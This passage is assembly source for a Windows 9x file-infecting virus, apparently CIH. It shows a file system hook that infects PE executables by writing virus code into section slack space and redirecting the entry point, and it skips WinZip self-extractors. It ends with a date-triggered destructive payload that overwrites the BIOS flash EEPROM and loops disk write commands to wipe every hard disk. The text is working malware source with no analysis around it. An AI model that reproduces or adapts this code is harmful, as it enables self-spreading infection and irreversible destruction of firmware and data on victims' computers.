mov ebp, eax
push 00000004h
pop ecx
push 0000003ch
pop edx
call edi ; VXDCall IFSMgr_Ring0_FileIO
mov edx, [esi]
; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************
dec edx
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; ***************************
cmp dword ptr [esi], 00455000h
jne CloseFile
; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************
; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark
; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer
; ***************************
; * Save ESP Register *
; ***************************
mov dr1, esp
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
push eax ; Size
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h]
; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************
mov al, SizeOfScetionTable
; I Assume NumberOfSections <= 0ffh
mov cl, (NumberOfSections-@8)[esi]
mul cl
; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable
add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-@9)[esi]
not ecx
inc ecx
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table
; Save Original Address of Entry Point
mov eax, (AddressOfEntryPoint-@9)[esi]
add eax, (ImageBase-@9)[esi]
mov (OriginalAddressOfEntryPoint-@9)[esi], eax
cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
jl OnlySetInfectedMark
; ***************************
; * Read All Section Tables *
; ***************************
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; ***************************
xchg eax, ebp
push 00000004h
pop ecx
push edx
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
add edx, 12h
call edi ; VXDCall IFSMgr_Ring0_FileIO
cmp dword ptr [esi], 'piZniW'
je NotSetInfectedMark
pop edx
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, ebp
push edx ; Pointer of File
add ebp, esi
push ebp ; Address of Buffer
; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
lea eax, [ebp+edi-04h]
mov [eax], ebx
; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************
push ebx ; Size
add edx, edi
push edx ; Pointer of File
lea edi, (MyVirusStart-@9)[esi]
push edi ; Address of Buffer
; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
mov (NewAddressOfEntryPoint-@9)[esi], edx
; ***************************
; * Setup Initial Data *
; ***************************
lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize
jmp StartToWriteCodeToSections
; ***************************
; * Write Code to Sections *
; ***************************
LoopOfWriteCodeToSections:
add edx, SizeOfScetionTable
mov ebx, (SizeOfRawData-@9)[edx]
sub ebx, (VirtualSize-@9)[edx]
jbe EndOfWriteCodeToSections
push ebx ; Size
sub eax, 08h
mov [eax], ebx
mov ebx, (PointerToRawData-@9)[edx]
add ebx, (VirtualSize-@9)[edx]
push ebx ; Pointer of File
push edi ; Address of Buffer
mov ebx, (VirtualSize-@9)[edx]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (ImageBase-@9)[esi]
mov [eax+4], ebx
mov ebx, [eax]
add (VirtualSize-@9)[edx], ebx
; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or (Characteristics-@9)[edx], 40000040h
StartToWriteCodeToSections:
sub ebp, ebx
jbe SetVirusCodeSectionTableEndMark
add edi, ebx ; Move Address of Buffer
EndOfWriteCodeToSections:
loop LoopOfWriteCodeToSections
; ***************************
; * Only Set Infected Mark *
; ***************************
OnlySetInfectedMark:
mov esp, dr1
jmp WriteVirusCodeToFile
; ***************************
; * Not Set Infected Mark *
; ***************************
NotSetInfectedMark:
add esp, 3ch
jmp CloseFile
; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************
SetVirusCodeSectionTableEndMark:
; Adjust Size of Virus Section Code to Correct Value
add [eax], ebp
add [esp+08h], ebp
; Set End Mark
xor ebx, ebx
mov [eax-04h], ebx
; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************
lea eax, (LastVxDCallAddress-2-@9)[esi]
mov cl, VxDCallTableSize
LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh
mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
mov [eax+2], edx
movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
sub eax, edx
loop LoopOfRestoreVxDCallID
; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************
WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax+10h]
mov edi, [eax]
LoopOfWriteVirusCodeToFile:
pop ecx
jecxz SetFileModificationMark
mov esi, ecx
mov eax, 0d601h
pop edx
pop ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
jmp LoopOfWriteVirusCodeToFile
; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************
SetFileModificationMark:
pop ebx
pop eax
stc ; Enable CF(Carry Flag)
pushf
; *************************************
; * Close File *
; *************************************
CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************
popf
pop esi
jnc IsKillComputer
; *************************************
; * Restore File Modification Time *
; *************************************
mov ebx, edi
mov ax, 4303h
mov ecx, (FileModificationTime-@7)[esi]
mov edi, (FileModificationTime+2-@7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Disable OnBusy *
; *************************************
DisableOnBusy:
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy
; *************************************
; * Call Previous FileSystemApiHook *
; *************************************
prevhook:
popad
mov eax, dr0 ;
jmp [eax] ; Jump to prevhook
; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; *************************************
pIFSFunc:
mov ebx, esp
push dword ptr [ebx+20h+04h+14h] ; Push pioreq
call [ebx+20h+04h] ; Call pIFSFunc
pop ecx ;
mov [ebx+1ch], eax ; Modify EAX Value in Stack
; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************
cmp dword ptr [ebx+20h+04h+04h], 00000024h
jne QuitMyVirusFileSystemHook
; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************
mov eax, [ecx+28h]
mov (FileModificationTime-@6)[esi], eax
; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; ***************************
QuitMyVirusFileSystemHook:
popad
ret
; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************
IsKillComputer:
; Get Now Day from BIOS CMOS
mov al, 07h
out 70h, al
in al, 71h
xor al, 01h ; ??/26/????
IF DEBUG
jmp DisableOnBusy
ELSE
jnz DisableOnBusy
ENDIF
; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************
; ***************************
; * Kill BIOS EEPROM *
; ***************************
mov bp, 0cf8h
lea esi, IOForEEPROM-@7[esi]
; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; ***********************
mov edi, 8000384ch
mov dx, 0cfeh
cli
call esi
; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
mov di, 0058h
dec edx ; and al,0fh
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
call esi
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************
lea ebx, EnableEEPROMToWrite-@10[esi]
mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h
push ecx
loop $
; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; ***********************
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************
mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; ***********************
mov ah, 0e0h
mov [eax], al
; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
; or al,10h
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
call esi
; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
; ***************************
; * Enable EEPROM to Write *
; ***************************
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte